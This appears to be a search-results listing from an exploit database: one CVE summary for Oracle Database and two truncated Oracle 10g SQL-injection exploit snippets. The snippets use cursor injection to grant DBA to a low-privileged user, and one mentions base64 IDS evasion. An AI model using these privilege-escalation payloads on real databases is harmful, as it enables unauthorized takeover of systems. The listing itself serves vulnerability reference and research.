3 matches found
CVE-2009-1972
Unspecified vulnerability in the Auditing component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, and 11.1.0.7 allows remote authenticated users to affect integrity, related to DBMSSYSSQL and DBMSSQL...
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection
This is slightly modified version of: http://milw0rm.com/exploits/7677 This is based on cursor injection and does not need create function privileges: DECLARE D NUMBER; BEGIN D := DBMSSQL.OPENCURSOR; DBMSSQL.PARSED,'declare pragma autonomoustransaction; begin execute immediate ''grant dba to...
Oracle 10g - LT.FINDRICSET SQL Injection (IDS Evasion)
Oracle 10g - LT.FINDRICSET SQL Injection IDS Evasion // / Oracle 10g LT.FINDRICSET SQL Injection Exploit / // / sploit grant DBA to scott / / evil cursor injection / / No "create procedure" privileg needed! / / + Funny IDS evasion vith base64 / // / tested on oracle 10.1.0.2.0 / // // / Date of...